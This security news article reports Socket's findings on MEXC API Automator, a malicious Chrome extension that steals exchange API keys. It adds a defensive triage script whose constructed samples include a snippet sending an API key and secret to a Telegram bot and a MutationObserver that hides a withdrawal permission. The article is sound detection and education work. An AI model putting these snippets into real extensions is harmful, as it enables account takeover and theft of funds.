The MEXC API Automator extension
A seemingly helpful tool for cryptocurrency traders has been exposed as a sophisticated wallet-draining trap. Socket’s Threat Research Team has identified a malicious Google Chrome extension, MEXC API Automator, that quietly hijacks user accounts on the MEXC exchange to steal funds.
Published on the Chrome Web Store on September 1, 2025, under the publisher name jorjortan142, the extension promised to simplify the tedious process of creating and managing API keys for high-frequency trading. Instead, it systematically looted the accounts of its users.
The attack worked because it looked like the thing it abused. Users installing the extension believed they were getting a utility that would set up API keys and automate trade execution for them. In reality, the software was a Trojan horse that used exactly that key-management workflow to hand the attackers persistent, programmatic control of the victim's exchange account.
According to the report, the extension “programmatically creates new MEXC API keys, enables withdrawal permissions, hides that permission in the user interface (UI), and exfiltrates the resulting API key and secret to a hardcoded Telegram bot controlled by the threat actor”.
This manipulation of the UI is particularly dangerous. Even if a vigilant user checked the API key settings page, the extension rewrote what the browser rendered so that the withdrawal permission appeared “disabled,” while on the exchange's servers the permission remained enabled. “The extension ensures the server side withdrawal permission is enabled while it appears disabled in the UI”. The practical lesson is that a permissions page viewed in a browser that has the extension installed cannot be trusted; the only reliable view of the account's API keys is one obtained from a browser profile or device where the extension was never present.
Socket’s analysis of the code revealed artifacts pointing to the malware’s origin. The researchers found numerous inline comments written in Russian, such as “Основная автоматизация” (main automation) and “Мониторинг изменений класса” (monitoring class changes), the latter sitting on the code that watches the settings page for DOM changes in order to keep the withdrawal toggle looking disabled.
“Russian language comments are frequent and concentrated around key logic, which strongly suggests that the threat actor behind the malicious Chrome extension is a Russian speaker,” the researchers noted, adding that this evidence supports a “moderate confidence assessment” linking the tool to a broader cluster of crypto-focused threats.
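The report describes three observable traits of the extension: an extension scope that covers both the exchange and api.telegram.org, a hardcoded Telegram bot that receives the stolen key and secret, and a content script that watches for DOM changes so it can keep the withdrawal permission looking disabled. The script below is an added example, not code from Socket's report or from the extension itself: a static triage pass over an unpacked extension's manifest and source files that flags those three traits. The manifest, the background script, the content script, the bot token and the chat id are all constructed for illustration; the exchange host name is passed in as a parameter.

```javascript
// Added example: static triage of an unpacked Chrome extension for the
// behaviours described in the article. Not the extension's own code and
// not from Socket's report. All sample inputs below are constructed.

// Telegram bot tokens look like "<8-10 digits>:<35 chars of [A-Za-z0-9_-]>".
const TOKEN_RE = /(?<![A-Za-z0-9_-])\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])/g;
// chat_id=123..., chat_id: "123..." and similar spellings.
const CHAT_ID_RE = /chat_id\W{0,3}(-?\d{5,})/g;

// Looks for a hardcoded Telegram bot (token + API host + destination chat).
function findTelegramExfil(source) {
  const tokens = [...source.matchAll(TOKEN_RE)].map((m) => m[0]);
  const usesApi = /api\.telegram\.org/.test(source);
  const chatIds = [...source.matchAll(CHAT_ID_RE)].map((m) => m[1]);
  return { tokens, usesApi, chatIds };
}

// Looks for the UI-spoofing pattern: a MutationObserver paired with code
// that rewrites element classes (how a toggle is forced to look "off").
function findDomTampering(source) {
  const observesDom = /new\s+MutationObserver\s*\(/.test(source);
  const rewritesClasses = /classList\.(add|remove|toggle)\s*\(|\.className\s*=/.test(source);
  return { observesDom, rewritesClasses };
}

// Collects every host pattern the extension asks for (MV3 host_permissions
// plus content_scripts[].matches) and checks whether it spans both the
// exchange and Telegram's API host.
function auditManifest(manifest, targetHost) {
  const patterns = [
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  const reachesTarget = patterns.some((p) => p.includes(targetHost));
  const reachesTelegram = patterns.some((p) => p.includes("api.telegram.org"));
  return { patterns, reachesTarget, reachesTelegram };
}

// ext = { manifest: <parsed manifest.json>, files: { "name.js": "<source>" } }
function triageExtension(ext, targetHost) {
  const findings = [];
  const m = auditManifest(ext.manifest || {}, targetHost);
  if (m.reachesTarget && m.reachesTelegram) {
    findings.push("manifest: scope covers " + targetHost + " and api.telegram.org");
  }
  for (const [name, src] of Object.entries(ext.files || {})) {
    const tg = findTelegramExfil(src);
    if (tg.tokens.length) {
      const redacted = tg.tokens.map((t) => t.slice(0, 4) + "***");
      findings.push(name + ": hardcoded Telegram bot token " + redacted.join(","));
    }
    if (tg.usesApi && tg.chatIds.length) {
      findings.push(name + ": posts to Telegram chat " + tg.chatIds.join(","));
    }
    const dom = findDomTampering(src);
    if (dom.observesDom && dom.rewritesClasses) {
      findings.push(name + ": MutationObserver that rewrites element classes (UI spoofing pattern)");
    }
  }
  return { findings, verdict: findings.length >= 2 ? "suspicious" : "no strong signal" };
}

// --- constructed sample extension (fake token, fake chat id) ---
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Constructed sample",
  host_permissions: ["https://*.mexc.com/*", "https://api.telegram.org/*"],
  content_scripts: [{ matches: ["https://*.mexc.com/*"], js: ["content.js"] }],
};
const SAMPLE_BACKGROUND = `
// constructed sample: send the freshly created key pair to a bot
const BOT = "123456789:AAFakeTokenForIllustration000000000";
async function exfil(apiKey, secret) {
  await fetch("https://api.telegram.org/bot" + BOT + "/sendMessage", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ chat_id: "987654321", text: apiKey + ":" + secret }),
  });
}
`;
const SAMPLE_CONTENT = `
// constructed sample: keep the withdrawal toggle rendered as "off"
const obs = new MutationObserver(() => {
  document.querySelectorAll('.withdraw-toggle').forEach((el) => el.classList.remove('on'));
});
obs.observe(document.body, { subtree: true, attributes: true, attributeFilter: ['class'] });
`;
const SAMPLE_EXTENSION = {
  manifest: SAMPLE_MANIFEST,
  files: { "background.js": SAMPLE_BACKGROUND, "content.js": SAMPLE_CONTENT },
};

console.log(JSON.stringify(triageExtension(SAMPLE_EXTENSION, "mexc.com"), null, 2));
```

Each check on its own is weak (plenty of benign extensions use MutationObserver, and a Telegram bot token is not proof of exfiltration), which is why the verdict requires at least two independent findings. Run it against the unpacked extension directory rather than the Web Store listing, since the listing never shows host permissions together with the code that uses them.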
This cluster also connects to the “SwapSushi” brand, which appears across Telegram bots and YouTube channels linked to the same actor.
By installing the extension, users effectively handed over their digital keys. “Any MEXC user who installs MEXC API Automator and allows it to create an API key effectively hands full programmatic control of their account to the threat actor”.
The attackers didn’t need passwords or 2FA codes. The extension's code ran inside the victim's own browser, so its requests to the exchange carried the user’s already-authenticated session; it simply rode that session to generate the API keys it needed, and those keys, once exfiltrated, let the attackers drain the account from anywhere without logging in again.
Socket has notified Google of the malicious extension. Anyone who installed it should remove it and then, from a browser profile or device on which the extension was never installed, review the API keys on their MEXC account and delete any they did not knowingly create.